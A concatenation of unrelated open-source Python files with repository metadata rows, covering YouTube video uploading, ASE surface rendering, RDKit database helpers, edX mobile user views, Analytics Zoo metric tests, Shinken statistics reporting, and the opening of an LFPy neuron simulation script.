# Explicitly tell the underlying HTTP transport library not to retry, since
# we are handling retry logic ourselves.
httplib2.RETRIES = 1
# Maximum number of times to retry before giving up.
MAX_RETRIES = 5
# Always retry when these exceptions are raised.
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, httplib.NotConnected,
httplib.IncompleteRead, httplib.ImproperConnectionState,
httplib.CannotSendRequest, httplib.CannotSendHeader,
httplib.ResponseNotReady, httplib.BadStatusLine)
# Always retry when an apiclient.errors.HttpError with one of these status
# codes is raised.
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google Developers Console at
# https://console.developers.google.com/.
# Please ensure that you have enabled the YouTube Data API for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "client_secrets.json"
# This OAuth 2.0 access scope allows an application to upload files to the
# authenticated user's YouTube channel, but doesn't allow other types of access.
YOUTUBE_UPLOAD_SCOPE = "https://www.googleapis.com/auth/youtube.upload"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the Developers Console
https://console.developers.google.com/
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
VALID_PRIVACY_STATUSES = ("public", "private", "unlisted")
def get_authenticated_service(args):
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
scope=YOUTUBE_UPLOAD_SCOPE,
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage("%s-oauth2.json" % sys.argv[0])
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run_flow(flow, storage, args)
return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=credentials.authorize(httplib2.Http()))
def initialize_upload(youtube, options):
tags = None
if options.keywords:
tags = options.keywords.split(",")
body=dict(
snippet=dict(
title=options.title,
description=options.description,
tags=tags,
categoryId=options.category
),
status=dict(
privacyStatus=options.privacyStatus
)
)
# Call the API's videos.insert method to create and upload the video.
insert_request = youtube.videos().insert(
part=",".join(body.keys()),
body=body,
# The chunksize parameter specifies the size of each chunk of data, in
# bytes, that will be uploaded at a time. Set a higher value for
# reliable connections as fewer chunks lead to faster uploads. Set a lower
# value for better recovery on less reliable connections.
#
# Setting "chunksize" equal to -1 in the code below means that the entire
# file will be uploaded in a single HTTP request. (If the upload fails,
# it will still be retried where it left off.) This is usually a best
# practice, but if you're using Python older than 2.6 or if you're
# running on App Engine, you should set the chunksize to something like
# 1024 * 1024 (1 megabyte).
media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)
)
resumable_upload(insert_request)
# This method implements an exponential backoff strategy to resume a
# failed upload.
def resumable_upload(insert_request):
response = None
error = None
retry = 0
while response is None:
try:
print "Uploading file..."
status, response = insert_request.next_chunk()
if 'id' in response:
print "Video id '%s' was successfully uploaded." % response['id']
else:
exit("The upload failed with an unexpected response: %s" % response)
except HttpError, e:
if e.resp.status in RETRIABLE_STATUS_CODES:
error = "A retriable HTTP error %d occurred:\n%s" % (e.resp.status,
e.content)
else:
raise
except RETRIABLE_EXCEPTIONS, e:
error = "A retriable error occurred: %s" % e
if error is not None:
print error
retry += 1
if retry > MAX_RETRIES:
exit("No longer attempting to retry.")
max_sleep = 2 ** retry
sleep_seconds = random.random() * max_sleep
print "Sleeping %f seconds and then retrying..." % sleep_seconds
time.sleep(sleep_seconds)
if __name__ == '__main__':
argparser.add_argument("--file", required=True, help="Video file to upload")
argparser.add_argument("--title", help="Video title", default="Test Title")
argparser.add_argument("--description", help="Video description",
default="Test Description")
argparser.add_argument("--category", default="22",
help="Numeric video category. " +
"See https://developers.google.com/youtube/v3/docs/videoCategories/list")
argparser.add_argument("--keywords", help="Video keywords, comma separated",
default="")
argparser.add_argument("--privacyStatus", choices=VALID_PRIVACY_STATUSES,
default=VALID_PRIVACY_STATUSES[0], help="Video privacy status.")
args = argparser.parse_args()
if not os.path.exists(args.file):
exit("Please specify a valid file using the --file= parameter.")
youtube = get_authenticated_service(args)
try:
initialize_upload(youtube, args)
except HttpError, e:
print "An HTTP error %d occurred:\n%s" % (e.resp.status, e.content)
| stu1992/Melbourne-Clouds | upload.py | Python | gpl-3.0 | 6,656 | [
"VisIt"
] | a36404025f01c6920f0cc756422ddcc1066e5cbffad774cc6b23a61c3e49c189 |
# -*- coding: utf-8 -*-
# creates: surface.png
from ase.io import read, write
exec(compile(open('N2Cu.py').read(), 'N2Cu.py', 'exec'))
image = read('N2Cu.traj@-1')
write('surface.pov', image, transparent=False, display=False, run_povray=True)
| misdoro/python-ase | doc/tutorials/surface.py | Python | gpl-2.0 | 243 | [
"ASE"
] | 97fa8f1bd83ec08d8a39bb4aa101d026f118cb054127e3951b8d2502863df81c |
# $Id$
#
# Copyright (C) 2003-2006 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
from __future__ import print_function
import sys
from rdkit import RDConfig
from rdkit.Dbase import DbModule
sqlTextTypes = DbModule.sqlTextTypes
sqlIntTypes = DbModule.sqlIntTypes
sqlFloatTypes = DbModule.sqlFloatTypes
sqlBinTypes = DbModule.sqlBinTypes
def GetDbNames(user='sysdba',password='masterkey',dirName='.',dBase='::template1',cn=None):
""" returns a list of databases that are available
**Arguments**
- user: the username for DB access
- password: the password to be used for DB access
**Returns**
- a list of db names (strings)
"""
if DbModule.getDbSql:
if not cn:
try:
cn = DbModule.connect(dBase,user,password)
except:
print('Problems opening database: %s'%(dBase))
return []
c = cn.cursor()
c.execute(DbModule.getDbSql)
if RDConfig.usePgSQL:
names = ['::'+str(x[0]) for x in c.fetchall()]
else:
names = ['::'+str(x[0]) for x in c.fetchall()]
names.remove(dBase)
elif DbModule.fileWildcard:
import os.path,glob
names = glob.glob(os.path.join(dirName,DbModule.fileWildcard))
else:
names = []
return names
def GetTableNames(dBase,user='sysdba',password='masterkey',
includeViews=0,cn=None):
""" returns a list of tables available in a database
**Arguments**
- dBase: the name of the DB file to be used
- user: the username for DB access
- password: the password to be used for DB access
- includeViews: if this is non-null, the views in the db will
also be returned
**Returns**
- a list of table names (strings)
"""
if not cn:
try:
cn = DbModule.connect(dBase,user,password)
except:
print('Problems opening database: %s'%(dBase))
return []
c = cn.cursor()
if not includeViews:
comm = DbModule.getTablesSql
else:
comm = DbModule.getTablesAndViewsSql
c.execute(comm)
names = [str(x[0]).upper() for x in c.fetchall()]
if RDConfig.usePgSQL and 'PG_LOGDIR_LS' in names:
names.remove('PG_LOGDIR_LS')
return names
def GetColumnInfoFromCursor(cursor):
if cursor is None or cursor.description is None: return []
results = []
if not RDConfig.useSqlLite:
for item in cursor.description:
cName = item[0]
cType = item[1]
if cType in sqlTextTypes:
typeStr='string'
elif cType in sqlIntTypes:
typeStr='integer'
elif cType in sqlFloatTypes:
typeStr='float'
elif cType in sqlBinTypes:
typeStr='binary'
else:
sys.stderr.write('odd type in col %s: %s\n'%(cName,str(cType)))
results.append((cName,typeStr))
else:
from rdkit.six import PY2, PY3
r = cursor.fetchone()
if not r: return results
for i,v in enumerate(r):
cName = cursor.description[i][0]
typ = type(v)
if typ == str or (PY2 and typ == unicode):
typeStr='string'
elif typ == int:
typeStr='integer'
elif typ == float:
typeStr='float'
elif (PY2 and typ == buffer) or (PY3 and typ in (memoryview, bytes)):
typeStr='binary'
else:
sys.stderr.write('odd type in col %s: %s\n'%(cName,typ))
results.append((cName,typeStr))
return results
def GetColumnNamesAndTypes(dBase,table,
user='sysdba',password='masterkey',
join='',what='*',cn=None):
""" gets a list of columns available in a DB table along with their types
**Arguments**
- dBase: the name of the DB file to be used
- table: the name of the table to query
- user: the username for DB access
- password: the password to be used for DB access
- join: an optional join clause (omit the verb 'join')
- what: an optional clause indicating what to select
**Returns**
- a list of 2-tuples containing:
1) column name
2) column type
"""
if not cn:
cn = DbModule.connect(dBase,user,password)
c = cn.cursor()
cmd = 'select %s from %s'%(what,table)
if join:
cmd += ' join %s'%(join)
c.execute(cmd)
return GetColumnInfoFromCursor(c)
def GetColumnNames(dBase,table,user='sysdba',password='masterkey',
join='',what='*',cn=None):
""" gets a list of columns available in a DB table
**Arguments**
- dBase: the name of the DB file to be used
- table: the name of the table to query
- user: the username for DB access
- password: the password to be used for DB access
- join: an optional join clause (omit the verb 'join')
- what: an optional clause indicating what to select
**Returns**
- a list of column names
"""
if not cn:
cn = DbModule.connect(dBase,user,password)
c = cn.cursor()
cmd = 'select %s from %s'%(what,table)
if join:
if join.strip().find('join') != 0:
join = 'join %s'%(join)
cmd +=' ' + join
c.execute(cmd)
c.fetchone()
desc = c.description
res = [str(x[0]) for x in desc]
return res
| strets123/rdkit | rdkit/Dbase/DbInfo.py | Python | bsd-3-clause | 5,347 | [
"RDKit"
] | cb2d1ce09305456af88f274c86e0c46dec552fdb918817b6a2485a47b245df05 |
"""
Views for user API
"""
from django.shortcuts import redirect
from django.utils import dateparse
from rest_framework import generics, views
from rest_framework.decorators import api_view
from rest_framework.response import Response
from opaque_keys.edx.keys import UsageKey
from opaque_keys import InvalidKeyError
from courseware.access import is_mobile_available_for_user
from courseware.model_data import FieldDataCache
from courseware.module_render import get_module_for_descriptor
from courseware.views import get_current_child, save_positions_recursively_up
from student.models import CourseEnrollment, User
from xblock.fields import Scope
from xblock.runtime import KeyValueStore
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import ItemNotFoundError
from .serializers import CourseEnrollmentSerializer, UserSerializer
from .. import errors
from ..utils import mobile_view, mobile_course_access
@mobile_view(is_user=True)
class UserDetail(generics.RetrieveAPIView):
"""
**Use Case**
Get information about the specified user and
access other resources the user has permissions for.
Users are redirected to this endpoint after logging in.
You can use the **course_enrollments** value in
the response to get a list of courses the user is enrolled in.
**Example request**:
GET /api/mobile/v0.5/users/{username}
**Response Values**
* id: The ID of the user.
* username: The username of the currently logged in user.
* email: The email address of the currently logged in user.
* name: The full name of the currently logged in user.
* course_enrollments: The URI to list the courses the currently logged
in user is enrolled in.
"""
queryset = (
User.objects.all()
.select_related('profile', 'course_enrollments')
)
serializer_class = UserSerializer
lookup_field = 'username'
@mobile_view(is_user=True)
class UserCourseStatus(views.APIView):
"""
**Use Case**
Get or update the ID of the module that the specified user last visited in the specified course.
**Example request**:
GET /api/mobile/v0.5/users/{username}/course_status_info/{course_id}
PATCH /api/mobile/v0.5/users/{username}/course_status_info/{course_id}
body:
last_visited_module_id={module_id}
modification_date={date}
The modification_date is optional. If it is present, the update will only take effect
if the modification_date is later than the modification_date saved on the server.
**Response Values**
* last_visited_module_id: The ID of the last module visited by the user in the course.
* last_visited_module_path: The ID of the modules in the path from the
last visited module to the course module.
"""
http_method_names = ["get", "patch"]
def _last_visited_module_path(self, request, course):
"""
Returns the path from the last module visited by the current user in the given course up to
the course module. If there is no such visit, the first item deep enough down the course
tree is used.
"""
field_data_cache = FieldDataCache.cache_for_descriptor_descendents(
course.id, request.user, course, depth=2)
course_module = get_module_for_descriptor(request.user, request, course, field_data_cache, course.id)
path = [course_module]
chapter = get_current_child(course_module, min_depth=2)
if chapter is not None:
path.append(chapter)
section = get_current_child(chapter, min_depth=1)
if section is not None:
path.append(section)
path.reverse()
return path
def _get_course_info(self, request, course):
"""
Returns the course status
"""
path = self._last_visited_module_path(request, course)
path_ids = [unicode(module.location) for module in path]
return Response({
"last_visited_module_id": path_ids[0],
"last_visited_module_path": path_ids,
})
def _update_last_visited_module_id(self, request, course, module_key, modification_date):
"""
Saves the module id if the found modification_date is less recent than the passed modification date
"""
field_data_cache = FieldDataCache.cache_for_descriptor_descendents(
course.id, request.user, course, depth=2)
try:
module_descriptor = modulestore().get_item(module_key)
except ItemNotFoundError:
return Response(errors.ERROR_INVALID_MODULE_ID, status=400)
module = get_module_for_descriptor(request.user, request, module_descriptor, field_data_cache, course.id)
if modification_date:
key = KeyValueStore.Key(
scope=Scope.user_state,
user_id=request.user.id,
block_scope_id=course.location,
field_name='position'
)
original_store_date = field_data_cache.last_modified(key)
if original_store_date is not None and modification_date < original_store_date:
# old modification date so skip update
return self._get_course_info(request, course)
save_positions_recursively_up(request.user, request, field_data_cache, module)
return self._get_course_info(request, course)
@mobile_course_access(depth=2)
def get(self, request, course, *args, **kwargs): # pylint: disable=unused-argument
"""
Get the ID of the module that the specified user last visited in the specified course.
"""
return self._get_course_info(request, course)
@mobile_course_access(depth=2)
def patch(self, request, course, *args, **kwargs): # pylint: disable=unused-argument
"""
Update the ID of the module that the specified user last visited in the specified course.
"""
module_id = request.DATA.get("last_visited_module_id")
modification_date_string = request.DATA.get("modification_date")
modification_date = None
if modification_date_string:
modification_date = dateparse.parse_datetime(modification_date_string)
if not modification_date or not modification_date.tzinfo:
return Response(errors.ERROR_INVALID_MODIFICATION_DATE, status=400)
if module_id:
try:
module_key = UsageKey.from_string(module_id)
except InvalidKeyError:
return Response(errors.ERROR_INVALID_MODULE_ID, status=400)
return self._update_last_visited_module_id(request, course, module_key, modification_date)
else:
# The arguments are optional, so if there's no argument just succeed
return self._get_course_info(request, course)
@mobile_view(is_user=True)
class UserCourseEnrollmentsList(generics.ListAPIView):
"""
**Use Case**
Get information about the courses the currently logged in user is
enrolled in.
**Example request**:
GET /api/mobile/v0.5/users/{username}/course_enrollments/
**Response Values**
* created: The date the course was created.
* mode: The type of certificate registration for this course: honor or
certified.
* is_active: Whether the course is currently active; true or false.
* certificate: Information about the user's earned certificate in the course.
* url: URL to the downloadable version of the certificate, if exists.
* course: A collection of data about the course:
* course_about: The URI to get the data for the course About page.
* course_updates: The URI to get data for course updates.
* number: The course number.
* org: The organization that created the course.
* video_outline: The URI to get the list of all vides the user can
access in the course.
* id: The unique ID of the course.
* subscription_id: A unique "clean" (alphanumeric with '_') ID of the course.
* latest_updates: Reserved for future use.
* end: The end date of the course.
* name: The name of the course.
* course_handouts: The URI to get data for course handouts.
* start: The data and time the course starts.
* course_image: The path to the course image.
"""
queryset = CourseEnrollment.objects.all()
serializer_class = CourseEnrollmentSerializer
lookup_field = 'username'
def get_queryset(self):
enrollments = self.queryset.filter(
user__username=self.kwargs['username'],
is_active=True
).order_by('created').reverse()
return [
enrollment for enrollment in enrollments
if enrollment.course and is_mobile_available_for_user(self.request.user, enrollment.course)
]
@api_view(["GET"])
@mobile_view()
def my_user_info(request):
"""
Redirect to the currently-logged-in user's info page
"""
return redirect("user-detail", username=request.user.username)
| vismartltd/edx-platform | lms/djangoapps/mobile_api/users/views.py | Python | agpl-3.0 | 9,321 | [
"VisIt"
] | 4d82c2e36d913be394c1ca3c9c75e72220b115b8f7e1051c1685faab4176d586 |
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from test.zoo.pipeline.utils.test_utils import ZooTestCase
from zoo.orca.automl.metrics import ME, MAE, MSE, RMSE, MSLE, R2
from zoo.orca.automl.metrics import MPE, MAPE, MSPE, sMAPE, MDAPE, sMDAPE
from numpy.testing import assert_almost_equal
from numpy.testing import assert_array_almost_equal
class TestMetrics(ZooTestCase):
def setup_method(self, method):
pass
def teardown_method(self, method):
pass
def test_metrics(self, n_samples=50):
y_true = np.arange(n_samples) + 1
y_pred = y_true + 1
assert_almost_equal(MSE(y_true, y_pred), [1.])
assert_almost_equal(MSLE(y_true, y_pred),
MSE(np.log(1 + y_true),
np.log(1 + y_pred)))
assert_almost_equal(MAE(y_true, y_pred), [1.])
assert_almost_equal(R2(y_true, y_pred), [0.995], 2)
assert_almost_equal(sMAPE(y_true, y_pred), [3.89], decimal=2)
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, -0.3, 2, 8]
assert_almost_equal(MAPE(y_true, y_pred), [17.74], decimal=2)
assert_almost_equal(MPE(y_true, y_pred), [10.6], decimal=2)
assert_almost_equal(RMSE(y_true, y_pred), [0.57], decimal=2)
assert_almost_equal(ME(y_true, y_pred), [-0.17], decimal=2)
assert_almost_equal(MSPE(y_true, y_pred), [5.2], decimal=2)
assert_almost_equal(MDAPE(y_true, y_pred), [15.48], decimal=2)
assert_almost_equal(sMDAPE(y_true, y_pred), [7.88], decimal=2)
def test_multioutput_metrics(self):
y_true = np.array([[1, 0, 0, 1], [0, 1, 1, 1], [1, 1, 0, 1]])
y_pred = np.array([[0, 0, 0, 1], [1, 0, 1, 1], [0, 0, 0, 1]])
assert_almost_equal(MSE(y_true, y_pred, multioutput='uniform_average'),
[(1. / 3 + 2. / 3 + 2. / 3) / 4.])
assert_almost_equal(MSLE(y_true, y_pred, multioutput='uniform_average'),
[0.200], decimal=2)
assert_almost_equal(MAE(y_true, y_pred, multioutput='uniform_average'),
[(1. + 2. / 3) / 4.])
assert_almost_equal(R2(y_true, y_pred, multioutput='variance_weighted'), [1. - 5. / 2])
assert_almost_equal(R2(y_true, y_pred, multioutput='uniform_average'), [-.875])
y_true = ([[3, -0.5, 2, 7], [3, -0.5, 2, 7], [3, -0.5, 2, 7]])
y_pred = ([[2.5, -0.3, 2, 8], [2.5, -0.3, 2, 8], [2.5, -0.3, 2, 8]])
assert_almost_equal(sMAPE(y_true, y_pred, multioutput='uniform_average'),
[10.19], decimal=2)
assert_almost_equal(MAPE(y_true, y_pred, multioutput='uniform_average'), [17.74], decimal=2)
assert_almost_equal(MPE(y_true, y_pred, multioutput='uniform_average'), [10.6], decimal=2)
assert_almost_equal(RMSE(y_true, y_pred, multioutput='uniform_average'), [0.57], decimal=2)
assert_almost_equal(ME(y_true, y_pred, multioutput='uniform_average'), [-0.18], decimal=2)
assert_almost_equal(MSPE(y_true, y_pred, multioutput='uniform_average'), [5.2], decimal=2)
assert_almost_equal(MDAPE(y_true, y_pred, multioutput='uniform_average'),
[17.74], decimal=2)
assert_almost_equal(sMDAPE(y_true, y_pred, multioutput='uniform_average'),
[10.19], decimal=2)
def test_highdim_metrics(self):
y_true = ([[[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]]])
y_pred = ([[[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]]])
assert_almost_equal(sMAPE(y_true, y_pred, multioutput='uniform_average'),
[10.19], decimal=2)
assert_almost_equal(MAPE(y_true, y_pred, multioutput='uniform_average'), [17.74], decimal=2)
assert_almost_equal(MPE(y_true, y_pred, multioutput='uniform_average'), [10.6], decimal=2)
assert_almost_equal(RMSE(y_true, y_pred, multioutput='uniform_average'), [0.57], decimal=2)
assert_almost_equal(ME(y_true, y_pred, multioutput='uniform_average'), [-0.18], decimal=2)
assert_almost_equal(MSPE(y_true, y_pred, multioutput='uniform_average'), [5.2], decimal=2)
assert_almost_equal(MDAPE(y_true, y_pred, multioutput='uniform_average'),
[17.74], decimal=2)
assert_almost_equal(sMDAPE(y_true, y_pred, multioutput='uniform_average'),
[10.19], decimal=2)
assert_almost_equal(MSE(y_true, y_pred, multioutput='uniform_average'), [0.32], decimal=2)
def test_highdim_array_metrics(self):
y_true = ([[[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]], [[3, -0.5], [2, 7]]])
y_pred = ([[[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]], [[2.5, -0.3], [2, 8]]])
assert_almost_equal(sMAPE(y_true, y_pred, multioutput='raw_values'),
[[9.09, 25], [0, 6.67]], decimal=2)
assert_almost_equal(MAPE(y_true, y_pred, multioutput='raw_values'),
[[16.67, 40.00], [0, 14.29]], decimal=2)
assert_almost_equal(RMSE(y_true, y_pred, multioutput='raw_values'),
[[0.5, 0.2], [0, 1]], decimal=2)
assert_almost_equal(MSE(y_true, y_pred, multioutput='raw_values'),
[[0.25, 0.04], [0, 1]], decimal=2)
def test_multioutput_array_metrics(self):
y_true = [[1, 2], [2.5, -1], [4.5, 3], [5, 7]]
y_pred = [[1, 1], [2, -1], [5, 4], [5, 6.5]]
assert_array_almost_equal(MSE(y_true, y_pred, multioutput='raw_values'),
[0.125, 0.5625], decimal=2)
assert_array_almost_equal(MAE(y_true, y_pred, multioutput='raw_values'),
[0.25, 0.625], decimal=2)
assert_array_almost_equal(R2(y_true, y_pred, multioutput='raw_values'),
[0.95, 0.93], decimal=2)
assert_array_almost_equal(sMAPE(y_true, y_pred, multioutput='raw_values'),
[4.09, 12.83], decimal=2)
assert_array_almost_equal(MAPE(y_true, y_pred, multioutput='raw_values'),
[7.78, 22.62], decimal=2)
assert_array_almost_equal(MPE(y_true, y_pred, multioutput='raw_values'),
[2.22, 5.95], decimal=2)
assert_array_almost_equal(RMSE(y_true, y_pred, multioutput='raw_values'),
[0.35, 0.75], decimal=2)
assert_array_almost_equal(ME(y_true, y_pred, multioutput='raw_values'),
[0., 0.12], decimal=2)
assert_array_almost_equal(MSPE(y_true, y_pred, multioutput='raw_values'),
[1.31, 9.16], decimal=2)
assert_array_almost_equal(MDAPE(y_true, y_pred, multioutput='raw_values'),
[5.56, 20.24], decimal=2)
assert_array_almost_equal(sMDAPE(y_true, y_pred, multioutput='raw_values'),
[2.63, 8.99], decimal=2)
def test_large_array_metrics(self):
y_true = np.ones((20000000, 4, 1), dtype=np.float32)
y_pred = np.zeros((20000000, 4, 1), dtype=np.float32)
assert_array_almost_equal(MAPE(y_true, y_pred, multioutput='raw_values'),
[[100], [100], [100], [100]], decimal=2)
assert_array_almost_equal(MSE(y_true, y_pred, multioutput='raw_values'),
[[1], [1], [1], [1]], decimal=2)
assert_array_almost_equal(MAE(y_true, y_pred, multioutput='raw_values'),
[[1], [1], [1], [1]], decimal=2)
assert_almost_equal(MSE(y_true, y_pred, multioutput='uniform_average'),
[1], decimal=2)
assert_almost_equal(MAPE(y_true, y_pred, multioutput='uniform_average'),
[100], decimal=2)
assert_almost_equal(MAE(y_true, y_pred, multioutput='uniform_average'),
[1], decimal=2)
| intel-analytics/analytics-zoo | pyzoo/test/zoo/orca/automl/test_metrics.py | Python | apache-2.0 | 8,596 | [
"ORCA"
] | 62014fbb78143cf55e729bb05115fa502dfcf3ddf97c35d1ceb03ea79ff0ed19 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
import threading
import time
import json
import hashlib
import base64
import socket
# For old users python-crypto was not mandatory, don't break their setup
try:
from Crypto.Cipher import AES
except ImportError:
AES = None
from shinken.log import logger
from shinken.http_client import HTTPClient, HTTPException
BLOCK_SIZE = 16
def pad (data):
pad = BLOCK_SIZE - len(data) % BLOCK_SIZE
return data + pad * chr(pad)
def unpad (padded):
pad = ord(padded[-1])
return padded[:-pad]
class Stats(object):
def __init__(self):
self.name = ''
self.type = ''
self.app = None
self.stats = {}
# There are two modes that are not exclusive
# first the kernel mode
self.api_key = ''
self.secret = ''
self.http_proxy = ''
self.con = HTTPClient(uri='http://kernel.shinken.io')
# then the statsd one
self.statsd_sock = None
self.statsd_addr = None
def launch_reaper_thread(self):
self.reaper_thread = threading.Thread(None, target=self.reaper, name='stats-reaper')
self.reaper_thread.daemon = True
self.reaper_thread.start()
def register(self, app, name, _type, api_key='', secret='', http_proxy='', statsd_host='localhost', statsd_port=8125, statsd_prefix='shinken', statsd_enabled=False):
self.app = app
self.name = name
self.type = _type
# kernel.io part
self.api_key = api_key
self.secret = secret
self.http_proxy = http_proxy
# local statsd part
self.statsd_host = statsd_host
self.statsd_port = statsd_port
self.statsd_prefix = statsd_prefix
self.statsd_enabled = statsd_enabled
if self.statsd_enabled:
logger.debug('Loading statsd communication with %s:%s.%s', self.statsd_host, self.statsd_port, self.statsd_prefix)
self.load_statsd()
# Also load the proxy if need
self.con.set_proxy(self.http_proxy)
# Let be crystal clear about why I don't use the statsd lib in python: it's crappy.
# how guys did you fuck this up to this point? django by default for the conf?? really?...
# So raw socket are far better here
def load_statsd(self):
try:
self.statsd_addr = (socket.gethostbyname(self.statsd_host), self.statsd_port)
self.statsd_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except (socket.error, socket.gaierror), exp:
logger.error('Cannot create statsd socket: %s' % exp)
return
# Will increment a stat key, if None, start at 0
def incr(self, k, v):
_min, _max, nb, _sum = self.stats.get(k, (None, None, 0, 0))
nb += 1
_sum += v
if _min is None or v < _min:
_min = v
if _max is None or v > _max:
_max = v
self.stats[k] = (_min, _max, nb, _sum)
# Manage local statd part
if self.statsd_sock and self.name:
# beware, we are sending ms here, v is in s
packet = '%s.%s.%s: %d|ms' % (self.statsd_prefix, self.name, k, v*1000)
try:
self.statsd_sock.sendto(packet, self.statsd_addr)
except (socket.error, socket.gaierror), exp:
pass # cannot send? ok not a huge problem here and cannot
# log because it will be far too verbose :p
def _encrypt(self, data):
m = hashlib.md5()
m.update(self.secret)
key = m.hexdigest()
m = hashlib.md5()
m.update(self.secret + key)
iv = m.hexdigest()
data = pad(data)
aes = AES.new(key, AES.MODE_CBC, iv[:16])
encrypted = aes.encrypt(data)
return base64.urlsafe_b64encode(encrypted)
def reaper(self):
while True:
now = int(time.time())
stats = self.stats
self.stats = {}
if len(stats) != 0:
s = ', '.join(['%s:%s' % (k,v) for (k,v) in stats.iteritems()])
# If we are not in an initializer daemon we skip, we cannot have a real name, it sucks
# to find the data after this
if not self.name or not self.api_key or not self.secret:
time.sleep(60)
continue
metrics = []
for (k,e) in stats.iteritems():
nk = '%s.%s.%s' % (self.type, self.name, k)
_min, _max, nb, _sum = e
_avg = float(_sum) / nb
# nb can't be 0 here and _min_max can't be None too
s = '%s.avg %f %d' % (nk, _avg, now)
metrics.append(s)
s = '%s.min %f %d' % (nk, _min, now)
metrics.append(s)
s = '%s.max %f %d' % (nk, _max, now)
metrics.append(s)
s = '%s.count %f %d' % (nk, nb, now)
metrics.append(s)
#logger.debug('REAPER metrics to send %s (%d)' % (metrics, len(str(metrics))) )
# get the inner data for the daemon
struct = self.app.get_stats_struct()
struct['metrics'].extend(metrics)
#logger.debug('REAPER whole struct %s' % struct)
j = json.dumps(struct)
if AES is not None and self.secret != '':
logger.debug('Stats PUT to kernel.shinken.io/api/v1/put/ with %s %s' % (self.api_key, self.secret))
# assume a %16 length messagexs
encrypted_text = self._encrypt(j)
try:
r = self.con.put('/api/v1/put/?api_key=%s' % (self.api_key), encrypted_text)
except HTTPException, exp:
logger.debug('Stats REAPER cannot put to the metric server %s' % exp)
time.sleep(60)
statsmgr = Stats()
| kaji-project/shinken | shinken/stats.py | Python | agpl-3.0 | 6,828 | [
"CRYSTAL"
] | 44946b6544d084fd514b1582dfcdd1dc6a989bd853a43ecd92e42a10d7f79305 |
import LFPy
import numpy as np
import matplotlib.pylab as pl
import sys
import os
import random as random
#setting a random seed to get the same result all the time
np.random.seed(1988)
#what this program need fro running
#where is and will be the data
f2 = open('cellname', 'r')
celln = [line.strip() for line in f2]
cellname = celln[0]
f2.close()
os.chdir(cellname)
#morphology
#sigma
#electrode coordinates
#morphology
f3 = open('morphology.txt', 'r')
morph = [line.strip() for line in f3]
morpho = morph[0]
f3.close()
#active channel description
f4 = open('active.txt', 'r')
actw = [line.strip() for line in f4]
activewhere = actw[0]
f4.close()
#electrode coordinates
felec = open('elcoord_x_y_z', 'r')
elec = [line.strip() for line in felec]
felec.close()
elc=np.hstack((elec))
elcor=elc.reshape(3,-1)
#tissue properties
f1 = open('elprop', 'r')
elp = [line.strip() for line in f1]
sigma =float(elp[1])
f1.close()
######################x
#synaptic inputs
def stationary_poisson(nsyn,lambd,tstart,tstop):
''' Generates nsyn stationary possion processes with rate lambda between tstart and tstop'''
interval_s = (tstop-tstart)*.001
spiketimes = []
for i in xrange(nsyn):
spikecount = np.random.poisson(interval_s*lambd)
spikevec = np.empty(spikecount)
if spikecount==0:
spiketimes.append(spikevec)
else:
spikevec = tstart + (tstop-tstart)*np.random.random(spikecount)
spiketimes.append(np.sort(spikevec)) #sort them too!
return spiketimes
###############
cell_parameters = {
'morphology' : morpho ,
'Ra': 123,
'tstartms' : 0., # start time of simulation, recorders start at t=0
'tstopms' : 850., # stop simulation at 200 ms.
'passive' : True,
'v_init' : -65, # initial crossmembrane potential
'e_pas' : -65, # reversal potential passive mechs
'nsegs_method' : 'fixed_length',
'max_nsegs_length':10,
